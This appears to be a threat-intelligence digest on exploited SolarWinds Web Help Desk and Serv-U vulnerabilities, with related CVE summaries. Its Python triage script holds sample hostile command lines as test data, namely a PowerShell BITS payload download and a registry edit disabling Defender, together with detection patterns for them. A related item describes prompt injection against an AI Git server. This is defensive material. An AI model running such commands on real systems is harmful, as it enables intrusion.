
Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

4 unique sources, 10 articles

Summary


SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds has also released security updates to patch four critical Serv-U remote code execution vulnerabilities that could grant attackers root access to unpatched servers. The most severe flaw, CVE-2025-40538, allows attackers with high privileges to gain root or admin permissions on vulnerable servers. These vulnerabilities include a broken access control flaw, two type confusion flaws, and an Insecure Direct Object Reference (IDOR) vulnerability. All four vulnerabilities require attackers to already have high privileges on the targeted servers.

Timeline

  1. 24.02.2026 15:00 1 article · 23h ago

    SolarWinds patches critical Serv-U vulnerabilities

    SolarWinds has released security updates to patch four critical Serv-U remote code execution vulnerabilities, including CVE-2025-40538, which allows attackers with high privileges to gain root or admin permissions on vulnerable servers. The vulnerabilities include a broken access control flaw, two type confusion flaws, and an Insecure Direct Object Reference (IDOR) vulnerability. All four vulnerabilities require attackers to already have high privileges on the targeted servers.

  2. 09.02.2026 16:42 3 articles · 15d ago

    Microsoft details multi-stage attacks exploiting SolarWinds Web Help Desk

    Microsoft observed multistage intrusions against WHD instances but could not determine whether the attacks exploited the recent flaws or older vulnerabilities. The attacks occurred in December 2025 and targeted machines vulnerable to both the old and the new sets of CVEs. Threat actors used living-off-the-land (LotL) techniques and legitimate administrative tools such as Zoho ManageEngine for lateral movement. The compromised service of a WHD instance spawned PowerShell, which used BITS to download and execute the payload. Huntress observed threat actors rapidly deploying Zoho Meetings and Cloudflare tunnels for persistence after gaining access via the WHD instance.

  3. 29.01.2026 11:00 7 articles · 27d ago

    SolarWinds releases updates for four critical Web Help Desk flaws

    Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools, such as Zoho ManageEngine and Velociraptor, for malicious purposes. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16.

    The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform, configured the tool for unattended access, and registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. Velociraptor served as the command-and-control (C2) framework, communicating with the attackers via Cloudflare Workers; the version used (0.73.4) is outdated and vulnerable to a privilege escalation flaw. Cloudflared, installed from Cloudflare's official GitHub repository, provided a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and the Windows Firewall via registry modifications so that fetching additional payloads would not be blocked, and downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender.

    System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public Internet access to the WHD admin interfaces, and reset all credentials associated with the product. The Shadowserver Foundation's Internet scans for CVE-2025-40551 show approximately 170 vulnerable WHD instances. Organizations should put their WHD instances behind firewalls or VPNs, remove direct Internet access to administrator paths, and review hosts for any unauthorized remote access tools such as Zoho Assist and Velociraptor. Microsoft recommended evicting any remote monitoring and management (RMM) tools in the network, such as Zoho ManageEngine, and rotating credentials for the WHD service and administrator accounts.

  4. 23.09.2025 15:46 3 articles · 5mo ago

    SolarWinds releases hotfix for critical deserialization vulnerability in Web Help Desk

    The hotfix is the third attempt to address the original flaw, CVE-2024-28986. SolarWinds Web Help Desk is used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component and is caused by unsafe deserialization handling. The hotfix requires installing Web Help Desk version 12.8.7 and replacing specific JAR files.

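The intrusion chain described in timeline items 2 and 3 (the WHD service spawning PowerShell to pull a payload via BITS, Defender and the firewall disabled through the registry, then Zoho Assist, Velociraptor and cloudflared appearing on the host) maps to a handful of host-level detections. The triage below is an added example, not code from SolarWinds, Microsoft or Huntress; the event format, the file paths, the Java parent image for the WHD service, the ZA_Connect.exe binary name and the sample IP are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
# Paths, the Java parent image for the WHD service, the IP address and the
# binary names are assumptions for this example, not values from the reports.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\WebHelpDesk\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden Start-BitsTransfer -Source http://198.51.100.7/a.msi -Destination C:\\Users\\Public\\a.msi"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Program Files (x86)\ZohoMeeting\ZA_Connect.exe",
     "cmdline": "ZA_Connect.exe /silent"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run --token REDACTED"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "Code.exe"},  # benign control event: no rule should fire
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Tools named in the reports; za_connect.exe as the Zoho Assist agent is an assumption.
RMM_OR_TUNNEL = {"cloudflared.exe", "velociraptor.exe", "za_connect.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

# Each rule is (name, predicate over one event). Rules are independent so one
# event can fire several of them, which is itself a strong triage signal.
RULES = [
    ("whd_service_spawns_shell",
     lambda e: "webhelpdesk" in e["parent"].lower() and basename(e["image"]) in SHELLS),
    ("bits_download",
     lambda e: re.search(r"(?i)start-bitstransfer|bitsadmin.*/transfer", e["cmdline"]) is not None),
    ("defender_or_firewall_tamper",
     lambda e: re.search(r"(?i)DisableAntiSpyware|DisableRealtimeMonitoring|EnableFirewall\b.*/d\s+0",
                         e["cmdline"]) is not None),
    ("rmm_or_tunnel_binary", lambda e: basename(e["image"]) in RMM_OR_TUNNEL),
]

def triage(events):
    """Return {rule_name: [event indexes]} for every rule that fired."""
    hits = defaultdict(list)
    for i, e in enumerate(events):
        for name, pred in RULES:
            if pred(e):
                hits[name].append(i)
    return dict(hits)

if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idx}")
```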


Similar Happenings

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability. Attackers have begun actively exploiting the CVE-2026-1731 vulnerability in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel. A proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. Threat actors have been observed exploiting CVE-2026-1731 to conduct network reconnaissance, deploy web shells, establish command-and-control (C2) channels, install backdoors and remote management tools, perform lateral movement, and exfiltrate data. The attacks have targeted financial services, legal services, high technology, higher education, wholesale and retail, and healthcare sectors across the U.S., France, Germany, Australia, and Canada. 
The vulnerability enables attackers to inject and execute arbitrary shell commands via the affected 'thin-scc-wrapper' script through the WebSocket interface. Attackers have deployed multiple web shells, including a PHP backdoor and a bash dropper, to maintain persistent access. Malware such as VShell and Spark RAT has been deployed as part of the exploitation. Out-of-band application security testing (OAST) techniques have been used to validate successful code execution and fingerprint compromised systems. Sensitive data, including configuration files, internal system databases, and a full PostgreSQL dump, has been exfiltrated to an external server. CVE-2026-1731 and CVE-2024-12356 share a common issue with input validation within distinct execution pathways. CVE-2026-1731 could be a target for sophisticated threat actors, similar to CVE-2024-12356, which was exploited by China-nexus threat actors such as Silk Typhoon. CISA has confirmed that CVE-2026-1731 has been exploited in ransomware campaigns. CISA added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog on February 13 and gave federal agencies three days to apply the patch or stop using the product. Proof-of-concept (PoC) exploits for CVE-2026-1731 became available shortly after the initial disclosure, and exploitation was detected on January 31, making it a zero-day vulnerability for at least a week. CISA has activated the 'Known To Be Used in Ransomware Campaigns?' indicator in the KEV catalog for CVE-2026-1731. Customers of the cloud-based application (SaaS) had the patch applied automatically on February 2. Self-hosted instance customers need to either enable automatic updates or manually install the patch. For Remote Support, the recommended version is 25.3.2. For Privileged Remote Access, the recommended version is 25.1.1 or newer. Customers still using RS v21.3 and PRA v22.1 are recommended to upgrade to a newer version before applying the patch.

Critical Authentication Bypass and RCE Flaws in SolarWinds Web Help Desk

SolarWinds has released patches for critical vulnerabilities in its Web Help Desk software, including authentication bypass and remote code execution (RCE) flaws. The vulnerabilities, reported by security researchers, can be exploited by unauthenticated attackers in low-complexity attacks. The company advises immediate patching due to the high risk of exploitation.

Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution

Three vulnerabilities in mcp-server-git, maintained by Anthropic, allow file access, file deletion, and code execution via prompt injection. The flaws have been addressed in versions 2025.9.25 and 2025.12.18. The vulnerabilities include path traversal and argument injection issues that can be exploited to manipulate Git repositories and execute arbitrary code. The issues were disclosed by Cyata researcher Yarden Porat, highlighting the risks of prompt injection attacks that need no direct system access. The vulnerabilities affect all versions of mcp-server-git released before December 8, 2025, and apply to default installations. An attacker only needs to influence what an AI assistant reads to trigger the vulnerabilities. The flaws allow attackers to execute code, delete arbitrary files, and load arbitrary files into a large language model's context. While the vulnerabilities do not directly exfiltrate data, sensitive files may still be exposed to the AI, creating downstream security and privacy risks. The vulnerabilities have been assigned CVE-2025-68143, CVE-2025-68144, and CVE-2025-68145.

Critical RCE Flaw in Trend Micro Apex Central On-Prem Windows

Trend Micro has addressed critical vulnerabilities in on-premise Windows versions of Apex Central, including a remote code execution (RCE) flaw (CVE-2025-69258) with a CVSS score of 9.8. The flaw allows unauthenticated remote attackers to execute arbitrary code under SYSTEM context. Two additional flaws (CVE-2025-69259, CVE-2025-69260) with CVSS scores of 7.5 each can cause denial-of-service conditions. The vulnerabilities affect versions below Build 7190 and require physical or remote access to exploit. Apex Central is a web-based management console that helps admins manage multiple Trend Micro products and services, including antivirus, content security, and threat detection. Trend Micro has released Critical Patch Build 7190 to address these vulnerabilities.

CISA Adds Actively Exploited Microsoft Office and HPE OneView Vulnerabilities to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities affecting Microsoft Office and HPE OneView to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation. The vulnerabilities include CVE-2009-0556 in Microsoft Office PowerPoint and CVE-2025-37164 in HPE OneView. The flaws allow for remote code execution and memory corruption. CISA urges federal agencies to apply patches by January 28, 2026, to mitigate risks. A proof-of-concept (PoC) exploit for CVE-2025-37164 has been publicly released, increasing the risk of exploitation.